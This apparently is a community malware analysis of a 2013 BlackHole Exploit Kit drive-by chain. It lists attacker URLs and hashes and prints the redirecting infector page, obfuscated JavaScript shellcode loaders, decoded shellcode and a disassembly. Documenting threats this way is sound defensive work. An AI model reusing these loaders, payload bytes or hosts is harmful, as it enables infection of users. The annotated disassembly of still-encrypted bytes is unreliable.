Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ===================================================
- #MalwareMustDie!
- BlackHole Exploit Kit with Double infector:
- Cridex & FakeAV/Ransomer (depends on your request IP)
- Infector: h00p://webworks.investorship.co.jp/page-329.htm
- Landing page/BHEK: h00p://46.175.224.21:8080/forum/links/public_version.php
- All of the cracked infectors download urls:
- //JARS
- ..using the applet in the same url as landing page (2 JARS found)
- //PDF:
- h00p://46.175.224.21:8080/forum/links/public_version.php?tzpiqxci=1h:1j:1j:32:1f&rqoddrzb=2w:3d:30&gejepm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&ifsrn=1k:1d:1f:1d:1g:1d:1f
- h00p://46.175.224.21:8080/forum/links/public_version.php?iitxovwc=1h:1j:1j:32:1f&hic=30&ztm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&dremyj=1k:1d:1f:1d:1g:1d:1f
- h00p://46.175.224.21:8080/forum/links/public_version.php?hysb=30:1n:1i:1i:33&togkor=3c:3m:3h&wafox=2v:1k:1m:32:33:1k:1k:31:1j:1o&wdnxc=1k:1d:1f:1d:1g:1d:1f
- h00p://46.175.224.21:8080/forum/links/public_version.php?myedivup=30:1n:1i:1i:33>aaynbu=35&kxqcms=2v:1k:1m:32:33:1k:1k:31:1j:1o&oiqkk=1k:1d:1f:1d:1g:1d:1f
- //SWF
- h00p://46.175.224.21:8080/forum/links/public_version.php?jwio=1h:1j:1j:32:1f&xnrj=3b:3l:37:3a:3k&ehn=1j:33:32:1l:1g:1i:1o:1n:1o:1i&fxqbltpx=cbfyrfg
- h00p://46.175.224.21:8080/forum/links/public_version.php?ecxrx=1h:1j:1j:32:1f&pihpkcv=3h:39:36:39&tlouh=1j:33:32:1l:1g:1i:1o:1n:1o:1i&cuchmcv=bda
- h00p://46.175.224.21:8080/forum/links/public_version.php?jsehhtfz=30:1n:1i:1i:33&rrhjmwf=32:3c:3a:3g:3d&ggrjtm=2v:1k:1m:32:33:1k:1k:31:1j:1o&vpx=mcms
- h00p://46.175.224.21:8080/forum/links/public_version.php?efoo=30:1n:1i:1i:33&bpsmrsqj=3k:31:3f:35&sokgxr=2v:1k:1m:32:33:1k:1k:31:1j:1o&engay=zhpldpx
- //Payloads:
- h00p://46.175.224.21:8080/forum/links/public_version.php?nf=1h:1j:1j:32:1f&je=1j:33:32:1l:1g:1i:1o:1n:1o:1i&t=1k&oy=p&jh=i
- h00p://46.175.224.21:8080/forum/links/public_version.php?tf=30:1n:1i:1i:33&we=2v:1k:1m:32:33:1k:1k:31:1j:1o&q=1k&mh=p&vv=r
- The catches:
- --------------
- 2013/02/18 15:08 2e9e095f7f276c495a0080b656e81d72 94,208 about.exe
- 2013/02/18 15:54 80930719764cb6c41840156800ee54f9 7,981 flash1.swf
- 2013/02/18 15:57 46dd4ea1cdb58bb38488cfbddf40a7cd 1,030 flash2.swf
- 2013/02/18 15:55 80930719764cb6c41840156800ee54f9 7,981 flash3.swf
- 2013/02/18 15:57 46dd4ea1cdb58bb38488cfbddf40a7cd 1,030 flash4.swf
- 2013/02/18 14:31 04022dd9cb3b5c236ec1e0e07d1a6ec1 13,873 java1.jar
- 2013/02/18 14:33 36df7f936b42abe2ccff75544f08f9f2 12,968 java2.jar
- 2013/02/18 13:54 96c6c9a9346a360d07236d5bd021adc1 434 page-329.htm
- 2013/02/18 15:50 6cfb52ab36855801313742a90593c6ec 20,161 pdf1.pdf
- 2013/02/18 15:50 40e02231bf9ffe321289cccae0191fd4 11,194 pdf2.pdf
- 2013/02/18 15:51 a57fcffb1040048e63b9f81b6ec096bf 20,161 pdf3.pdf
- 2013/02/18 15:52 df86cbbc78748287e62be9a1248711ea 11,160 pdf4.pdf
- 2013/02/18 14:13 b5de89429d354f138d59673e88907b3b 118,326 public_version-2..php
- 2013/02/18 14:16 a5acd12a633e01d575976de4423b8642 118,301 public_version.php
- 2013/02/18 15:08 04e9d4167c9a1b82e622e04ad85f8e99 279,040 readme.exe
- -----
- Total: 2 SWF, 4 PDF, 2 Jars, 2 Payloads
- Infector found by @Hulk_Crusader, followed: @unixfreaxjp, GeoIP analysis: @it4sec
- =================================================================
- // infector:
- h00p://webworks.investorship.co.jp/page-329.htm
- --2013-02-18 14:11:12-- h00p://webworks.investorship.co.jp/page-329.htm
- Resolving webworks.investorship.co.jp... seconds 0.00, 117.20.100.110
- Caching webworks.investorship.co.jp => 117.20.100.110
- Connecting to webworks.investorship.co.jp|117.20.100.110|:80... seconds 0.00, connected.
- :
- GET /page-329.htm h00p/1.0
- Host: webworks.investorship.co.jp
- h00p request sent, awaiting response...
- :
- h00p/1.1 200 OK
- Date: Mon, 18 Feb 2013 05:11:05 GMT
- Server: Apache
- Last-Modified: Mon, 18 Feb 2013 04:54:14 GMT
- ETag: "1185062d-1b2-5121b3f6"
- Accept-Ranges: bytes
- Content-Length: 434
- Connection: close
- Content-Type: text/html
- :
- 200 OK
- Length: 434 [text/html]
- Saving to: `page-329.htm'
- 2013-02-18 14:11:12 (9.15 MB/s) - `page-329.htm' saved [434/434]
- //-------cat---------------
- <html>
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
- <title>Please wait</title>
- </head>
- <body>
- <h1><b>Please wait a moment ... You will be forwarded... </h1></b>
- <h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
- <script>
- var1=49;
- var2=var1;
- if(var1==var2) {document.location="h00p://46.175.224.21:8080/forum/links/public_version.php";}
- </script>
- </body>
- </html>
- // -----------landing page/is a BHEK moronz.----------------------
- --2013-02-18 14:13:40-- h00p://46.175.224.21:8080/forum/links/public_version.php
- seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
- :
- GET /forum/links/public_version.php http/1.0
- Referer: h00p://webworks.investorship.co.jp/page-329.htm
- Host: 46.175.224.21:8080
- http request sent, awaiting response...
- :
- Server: nginx/1.0.10
- Date: Mon, 18 Feb 2013 05:13:34 GMT
- Content-Type: text/html; charset=CP-1251
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Vary: Accept-Encoding
- http/1.1 200 OK
- Server: nginx/1.0.10
- Date: Mon, 18 Feb 2013 05:16:04 GMT
- Content-Type: text/html; charset=CP-1251
- Connection: close
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Vary: Accept-Encoding
- 200 OK
- Length: unspecified [text/html]
- Saving to: `public_version.php'
- 2013-02-18 14:16:13 (95.7 KB/s) - `public_version.php' saved [118301]
- // -----------------checks the jars..---------------------
- // get java old....
- --2013-02-18 14:31:39-- h00p://46.175.224.21:8080/forum/links/public_version.php
- seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
- :
- GET /forum/links/public_version.php http/1.0
- User-Agent: Java/1.6.0_23
- Host: 46.175.224.21:8080
- h00p request sent, awaiting response...
- :
- h00p/1.1 200 OK
- Server: nginx/1.0.10
- Date: Mon, 18 Feb 2013 05:31:33 GMT
- Content-Type: application/java-archive
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Content-Length: 13873
- ETag: "04022dd9cb3b5c236ec1e0e07d1a6ec1"
- Last-Modified: Mon, 18 Feb 2013 05:31:33 GMT
- Accept-Ranges: bytes
- :
- 200 OK
- Length: 13873 (14K) [application/java-archive]
- Saving to: `java1.jar'
- 2013-02-18 14:31:41 (21.7 KB/s) - `java1.jar' saved [13873/13873]
- // get java newer...
- --2013-02-18 14:33:22-- h00p://46.175.224.21:8080/forum/links/public_version.php
- seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
- :
- GET /forum/links/public_version.php http/1.0
- User-Agent: Java/1.7.0_09
- Host: 46.175.224.21:8080
- h00p request sent, awaiting response...
- :
- h00p/1.1 200 OK
- Server: nginx/1.0.10
- Date: Mon, 18 Feb 2013 05:33:15 GMT
- Content-Type: application/java-archive
- Connection: keep-alive
- X-Powered-By: PHP/5.3.18-1~dotdeb.0
- Content-Length: 12968
- ETag: "36df7f936b42abe2ccff75544f08f9f2"
- Last-Modified: Mon, 18 Feb 2013 05:33:15 GMT
- Accept-Ranges: bytes
- :
- 200 OK
- Length: 12968 (13K) [application/java-archive]
- Saving to: `./java2.jar'
- 2013-02-18 14:33:23 (41.0 KB/s) - `./java2.jar' saved [12968/12968]
- // -------------------------------------------------------
- // see both plugin-detects....
- // it has different shellcodes... two payloads...
- // has 2 PDF, 2 SWF, 2 JARS each payload
- // PD1.txt : http://pastebin.com/raw.php?i=CpRXS5m3
- // and PD2.txt : http://pastebin.com/raw.php?i=MkYVRz4R
- // ==========================================================================
- // ========================================
- // get the deobs + crack both shellcodes:
- // ========================================
- var a = "8200!%1482!%0451!%e024!%5185!%7415!%34e0!%5191!%e0c5!%9114!%7421!%2191!%9164!%7421!%2191!%9114!%f421!%2191!%9144!%a121!%21b1!%b1b1!%2421!%5191!%24d4!%e4e0!%2191!%b1a1!%2421!%2191!%9124!%0421!%5191!%64e4!%8571!%8504!%6460!%1474!%a5b5!%e5d4!%b477!%4414!%d5a4!%7085!%34b5!%1464!%7044!%d554!%74a5!%70e4!%0181!%0181!%9121!%60a1!%a1c1!%60a1!%f1d1!%6091!%c1e1!%7070!%8521!%c5c5!%8504!%2370!%15e1!%eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8224!%ce24!%82d5!%8a71!%2df6!%82d5!%8a71!%b3f6!%a23c!%423c!%babe!%e7c2!%b77d!%3c42!%82ba!%c224!%7de7!%82b7!%e324!%8ed5!%c3da!%7de7!%2482!%b7f7!%2482!%2482!%9697!%53c2!%0ac6!%c281!%2a9e!%8217!%5312!%eec6!%4444!%60c4!%53d2!%fec6!%a4c5!%f585!%5382!%fec6!%1e97!%0cb1!%423a!%7de7!%8282!%0d82!%b704!%b580!%8050!%c002!%fec6!%b1a1!%e5a5!%c0c2!%fec6!%f4b5!%a5d4!%c2c0!%42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!%7d3c!%7d7d!%0c94!%3a0c!%ce02!%e3ba!%c77d!%4454!%d5a5!%8204!%6482!%0474!%7dbc!%bed2!%83ba!%3a67!%3a4c!%87d7!%8e13!%87ba!%8282!%7d82!%8604!%8724!%8207!%8282!%0c82!%ac1d!%7d7d!%0b7d!%170c!%24d2!%3afd!%0402!%bd3a!%eb3c!%c5b2!%42b1!%8a55!%0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%ef08!%9e30!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%".split("").reverse().join("");
- var xxx= a["replace"](/\%!/g, "%" + "u");
- document.write(xxx);
- var b = "8200!%a582!%e551!%e0e5!%5185!%5404!%34e0!%5191!%e095!%9174!%2421!%2191!%b191!%3421!%2191!%9134!%b121!%21b1!%b1a1!%5421!%2191!%9134!%e521!%51a1!%f5d4!%b1e0!%21b1!%9114!%1421!%2191!%9164!%8121!%51b1!%c5e4!%8571!%8504!%6460!%1474!%a5b5!%e5d4!%b477!%4414!%d5a4!%7085!%34b5!%1464!%7044!%d554!%74a5!%70e4!%0181!%0181!%9121!%60a1!%a1c1!%60a1!%f1d1!%6091!%c1e1!%7070!%8521!%c5c5!%8504!%2370!%15e1!%eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8224!%ce24!%82d5!%8a71!%2df6!%82d5!%8a71!%b3f6!%a23c!%423c!%babe!%e7c2!%b77d!%3c42!%82ba!%c224!%7de7!%82b7!%e324!%8ed5!%c3da!%7de7!%2482!%b7f7!%2482!%2482!%9697!%53c2!%0ac6!%c281!%2a9e!%8217!%5312!%eec6!%4444!%60c4!%53d2!%fec6!%a4c5!%f585!%5382!%fec6!%1e97!%0cb1!%423a!%7de7!%8282!%0d82!%b704!%b580!%8050!%c002!%fec6!%b1a1!%e5a5!%c0c2!%fec6!%f4b5!%a5d4!%c2c0!%42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!%7d3c!%7d7d!%0c94!%3a0c!%ce02!%e3ba!%c77d!%4454!%d5a5!%8204!%6482!%0474!%7dbc!%bed2!%83ba!%3a67!%3a4c!%87d7!%8e13!%87ba!%8282!%7d82!%8604!%8724!%8207!%8282!%0c82!%ac1d!%7d7d!%0b7d!%170c!%24d2!%3afd!%0402!%bd3a!%eb3c!%c5b2!%42b1!%8a55!%0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%ef08!%9e30!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%".split("").reverse().join("");
- var yyy= b["replace"](/\%!/g, "%" + "u");
- document.write("\n\n"+yyy);
- // output:
- %u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u03e9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u1e1c%u1906%u1d1f%u1a06%u1c1a%u1a06%u1219%u1810%u1810%u4e07%u5a47%u455d%u4407%u4641%u5b43%u5807%u4a5d%u4144%u774b%u4d5e%u5b5a%u4741%u0646%u4058%u1758%u4e46%u1915%u1240%u4219%u1912%u1242%u1a1b%u1912%u0e4e%u4d42%u1915%u1242%u1b1b%u1b12%u121a%u4419%u1912%u124f%u4119%u1912%u1247%u4619%u1912%u1247%u4119%u5c0e%u1915%u0e43%u5147%u5815%u420e%u1540%u2841%u0028
- %u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u03e9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u1e1c%u1906%u1d1f%u1a06%u1c1a%u1a06%u1219%u1810%u1810%u4e07%u5a47%u455d%u4407%u4641%u5b43%u5807%u4a5d%u4144%u774b%u4d5e%u5b5a%u4741%u0646%u4058%u1758%u4e5c%u1b15%u1218%u4619%u1912%u1241%u4119%u1b12%u0e1b%u4d5f%u1a15%u125e%u4319%u1912%u1245%u1a1b%u1b12%u121b%u4319%u1912%u1243%u191b%u1912%u1242%u4719%u590e%u1915%u0e43%u4045%u5815%u5e0e%u155e%u285a%u0028
- // ========================
- // shellcode analysis...
- // ========================
- // break the eggs... no text...one time...
- // raws...
- 414141418366fce4ebfc5810c931816603e980fe2830e240ebfae805ffebffffccad1c5d77c1e81ba34c186868a3a3243458a37e205ef31ba34e14765c2b041bc6a9383dd7d7a39018686eeb2e11d35d1cafad0c5dccc17964c37e795da3a3141d5c2b507edd5ea32b081bdd61e1d4692b851bed27f33896da10205ce3e92b2568f2d9c33713ce5da3760c76f52ba34e63246ea5d7c40c7ca3242bf0a3f5a32ced2b7683eb717bc3a385084055a81b242b5cc3bea3db2040dfa32d42c071d7b0d7d7d1ca28c0282870284278406828d72828ab7831e87d78c4a376a3ab382debcbd74740284640285a5d4544d77cab3e20ecc0a349c0d7d7c3d7c32aa95a2cc42829a5280c74ef240c2c4d5a5b4f6cef2c0c5a5e1a1b6cef200c0508085b407b28d028287ed7a3241bc079e16cef2835585f5c4a6cef2d354c0644446cee21357128e9a2182c6ca02c357969284228427f7b28427ed7ad3c5de8423e7b287ed7422cab2824c3d77b2c7eebabc324c32a6f3b17a85d286fd217a85d2842ec4228d7d6207eb4c0d7d6a6d72666b0c4a2d6a12629471b95a2e233736eee1e51073240585c5c125807071e1c19061d1f1a061c1a1a061219181018104e075a47455d440746415b4358074a5d4144774b4d5e5b5a47410646405817584e46191512404219191212421a1b19120e4e4d42191512421b1b1b12121a44191912124f41191912124746191912124741195c0e19150e4351475815420e154028410028
- // view...
- 41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81 AAAAf......X1.f.
- e9 03 fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff ....0(@.........
- ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 ..]..w..L.h..h$.
- 58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04 X4~.^...N.v.+\..
- a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3 ..=8....h..n..].
- af 1c 0c ad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3 .....]y..dy~.]..
- 5c 1d 50 2b dd 7e a3 5e 08 2b dd 1b e1 61 69 d4 \.P+.~.^.+...ai.
- 85 2b ed 1b f3 27 96 38 10 da 5c 20 e9 e3 25 2b .+...'.8..\...%+
- f2 68 c3 d9 13 37 5d ce 76 a3 76 0c 2b f5 4e a3 .h...7].v.v.+.N.
- 24 63 a5 6e c4 d7 7c 0c 24 a3 f0 2b f5 a3 2c a3 $c.n..|.$..+..,.
- 2b ed 83 76 71 eb c3 7b 85 a3 40 08 a8 55 24 1b +..vq..{..@..U$.
- 5c 2b be c3 db a3 40 20 a3 df 42 2d 71 c0 b0 d7 \+....@...B-q...
- d7 d7 ca d1 c0 28 28 28 28 70 78 42 68 40 d7 28 .....((((pxBh@.(
- 28 28 78 ab e8 31 78 7d a3 c4 a3 76 38 ab eb 2d ((x..1x}...v8..-
- d7 cb 40 47 46 28 28 40 5d 5a 44 45 7c d7 3e ab ..@GF((@]ZDE|.>.
- ec 20 a3 c0 c0 49 d7 d7 d7 c3 2a c3 5a a9 c4 2c .....I....*.Z..,
- 29 28 28 a5 74 0c 24 ef 2c 0c 5a 4d 4f 5b ef 6c )((.t.$.,.ZMO[.l
- 0c 2c 5e 5a 1b 1a ef 6c 0c 20 08 05 5b 08 7b 40 .,^Z...l....[.{@
- d0 28 28 28 d7 7e 24 a3 c0 1b e1 79 ef 6c 35 28 .(((.~$....y.l5(
- 5f 58 4a 5c ef 6c 35 2d 06 4c 44 44 ee 6c 35 21 _XJ\.l5-.LDD.l5!
- 28 71 a2 e9 2c 18 a0 6c 35 2c 69 79 42 28 42 28 (q..,..l5,iyB(B(
- 7b 7f 42 28 d7 7e 3c ad e8 5d 3e 42 28 7b d7 7e {.B(.~<..]>B({.~
- 2c 42 28 ab c3 24 7b d7 7e 2c ab eb 24 c3 2a c3 ,B(..${.~,..$.*.
- 3b 6f a8 17 28 5d d2 6f a8 17 28 5d ec 42 28 42 ;o..(].o..(].B(B
- d6 d7 7e 20 c0 b4 d6 d7 d7 a6 66 26 c4 b0 d6 a2 ..~.......f&....
- 26 a1 47 29 95 1b e2 a2 73 33 ee 6e 51 1e 32 07 &.G)....s3.nQ.2.
- 58 40 5c 5c 58 12 07 07 1c 1e 06 19 1f 1d 06 1a X@\\X...........
- 1a 1c 06 1a 19 12 10 18 10 18 07 4e 47 5a 5d 45 ...........NGZ]E
- 07 44 41 46 43 5b 07 58 5d 4a 44 41 4b 77 5e 4d .DAFC[.X]JDAKw^M
- 5a 5b 41 47 46 06 58 40 58 17 5c 4e 15 1b 18 12 Z[AGF.X@X.\N....
- 19 46 12 19 41 12 19 41 12 1b 1b 0e 5f 4d 15 1a .F..A..A...._M..
- 5e 12 19 43 12 19 45 12 1b 1a 12 1b 1b 12 19 43 ^..C..E........C
- 12 19 43 12 1b 19 12 19 42 12 19 47 0e 59 15 19 ..C.....B..G.Y..
- 43 0e 45 40 15 58 0e 5e 5e 15 5a 28 28 00 C.E@.X.^^.Z((.
- //disasm..
- 00000000 41 inc ecx
- 00000001 41 inc ecx
- 00000002 41 inc ecx
- 00000003 41 inc ecx
- 00000004 8366FCE4 and dword [esi-0x4],byte -0x1c
- 00000008 EBFC jmp short 0x6 ; loop
- 0000000A 58 pop eax
- 0000000B 10C9 adc cl,cl
- 0000000D 31816603E980 xor [ecx-0x7f16fc9a],eax ; decryption
- 00000013 FE db 0xfe
- 00000014 2830 sub [eax],dh ; math
- 00000016 E240 loop 0x58 ; loop
- 00000018 EBFA jmp short 0x14 ; loop
- 0000001A E805FFEBFF call dword 0xffebff24 ; call
- 0000001F FFCC dec esp
- 00000021 AD lodsd
- 00000022 1C5D sbb al,0x5d
- 00000024 77C1 ja 0xffffffe7
- 00000026 E81BA34C18 call dword 0x184ca346 ; call
- 0000002B 6868A3A324 push dword 0x24a3a368
- 00000030 3458 xor al,0x58 ; decryption
- 00000032 A37E205EF3 mov [0xf35e207e],eax
- 00000037 1BA34E14765C sbb esp,[ebx+0x5c76144e]
- 0000003D 2B041B sub eax,[ebx+ebx] ; math
- 00000040 C6 db 0xc6
- 00000041 A9383DD7D7 test eax,0xd7d73d38
- 00000046 A39018686E mov [0x6e681890],eax
- 0000004B EB2E jmp short 0x7b ; loop
- 0000004D 11D3 adc ebx,edx
- 0000004F 5D pop ebp
- 00000050 1CAF sbb al,0xaf
- 00000052 AD lodsd
- 00000053 0C5D or al,0x5d
- 00000055 CC int3
- 00000056 C17964C3 sar dword [ecx+0x64],0xc3
- 0000005A 7E79 jng 0xd5
- 0000005C 5D pop ebp
- 0000005D A3A3141D5C mov [0x5c1d14a3],eax
- 00000062 2B507E sub edx,[eax+0x7e] ; math
- 00000065 DD5EA3 fstp qword [esi-0x5d]
- 00000068 2B08 sub ecx,[eax] ; math
- 0000006A 1BDD sbb ebx,ebp
- 0000006C 61 popad
- 0000006D E1D4 loope 0x43
- 0000006F 692B851BED27 imul ebp,[ebx],dword 0x27ed1b85
- 00000075 F33896DA10205C rep cmp [esi+0x5c2010da],dl
- 0000007C E3E9 jecxz 0x67
- 0000007E 2B2568F2D9C3 sub esp,[dword 0xc3d9f268] ; math
- 00000084 37 aaa
- 00000085 13CE adc ecx,esi
- 00000087 5D pop ebp
- 00000088 A3760C76F5 mov [0xf5760c76],eax
- 0000008D 2BA34E63246E sub esp,[ebx+0x6e24634e] ; math
- 00000093 A5 movsd
- 00000094 D7 xlatb
- 00000095 C40C7C les ecx,[esp+edi*2]
- 00000098 A3242BF0A3 mov [0xa3f02b24],eax
- 0000009D F5 cmc
- 0000009E A32CED2B76 mov [0x762bed2c],eax
- 000000A3 83EB71 sub ebx,byte +0x71 ; math
- 000000A6 7BC3 jpo 0x6b
- 000000A8 A385084055 mov [0x55400885],eax
- 000000AD A81B test al,0x1b
- 000000AF 242B and al,0x2b
- 000000B1 5C pop esp
- 000000B2 C3 ret
- 000000B3 BEA3DB2040 mov esi,0x4020dba3
- 000000B8 DFA32D42C071 fbld tword [ebx+0x71c0422d]
- 000000BE D7 xlatb
- 000000BF B0D7 mov al,0xd7
- 000000C1 D7 xlatb
- 000000C2 D1CA ror edx,1 ; bitwise cipher
- 000000C4 28C0 sub al,al ; math
- 000000C6 2828 sub [eax],ch ; math
- 000000C8 7028 jo 0xf2
- 000000CA 42 inc edx
- 000000CB 7840 js 0x10d
- 000000CD 6828D72828 push dword 0x2828d728
- 000000D2 AB stosd
- 000000D3 7831 js 0x106
- 000000D5 E87D78C4A3 call dword 0xa3c47957 ; call
- 000000DA 76A3 jna 0x7f
- 000000DC AB stosd
- 000000DD 382DEBCBD747 cmp [dword 0x47d7cbeb],ch
- 000000E3 40 inc eax
- 000000E4 284640 sub [esi+0x40],al ; math
- 000000E7 285A5D sub [edx+0x5d],bl ; math
- 000000EA 45 inc ebp
- 000000EB 44 inc esp
- 000000EC D7 xlatb
- 000000ED 7CAB jl 0x9a
- 000000EF 3E20EC ds and ah,ch
- 000000F2 C0A349C0D7D7C3 shl byte [ebx-0x28283fb7],0xc3
- 000000F9 D7 xlatb
- 000000FA C3 ret
- 000000FB 2AA95A2CC428 sub ch,[ecx+0x28c42c5a] ; math
- 00000101 29A5280C74EF sub [ebp-0x108bf3d8],esp ; math
- 00000107 240C and al,0xc
- 00000109 2C4D sub al,0x4d ; math
- 0000010B 5A pop edx
- 0000010C 5B pop ebx
- 0000010D 4F dec edi
- 0000010E 6C insb
- 0000010F EF out dx,eax
- 00000110 2C0C sub al,0xc ; math
- 00000112 5A pop edx
- 00000113 5E pop esi
- 00000114 1A1B sbb bl,[ebx]
- 00000116 6C insb
- 00000117 EF out dx,eax
- 00000118 200C0508085B40 and [eax+0x405b0808],cl
- 0000011F 7B28 jpo 0x149
- 00000121 D028 shr byte [eax],1
- 00000123 287ED7 sub [esi-0x29],bh ; math
- 00000126 A3241BC079 mov [0x79c01b24],eax
- 0000012B E16C loope 0x199
- 0000012D EF out dx,eax
- 0000012E 2835585F5C4A sub [dword 0x4a5c5f58],dh ; math
- 00000134 6C insb
- 00000135 EF out dx,eax
- 00000136 2D354C0644 sub eax,0x44064c35 ; math
- 0000013B 44 inc esp
- 0000013C 6C insb
- 0000013D EE out dx,al
- 0000013E 21357128E9A2 and [dword 0xa2e92871],esi
- 00000144 182C6C sbb [esp+ebp*2],ch
- 00000147 A02C357969 mov al,[0x6979352c]
- 0000014C 284228 sub [edx+0x28],al ; math
- 0000014F 42 inc edx
- 00000150 7F7B jg 0x1cd
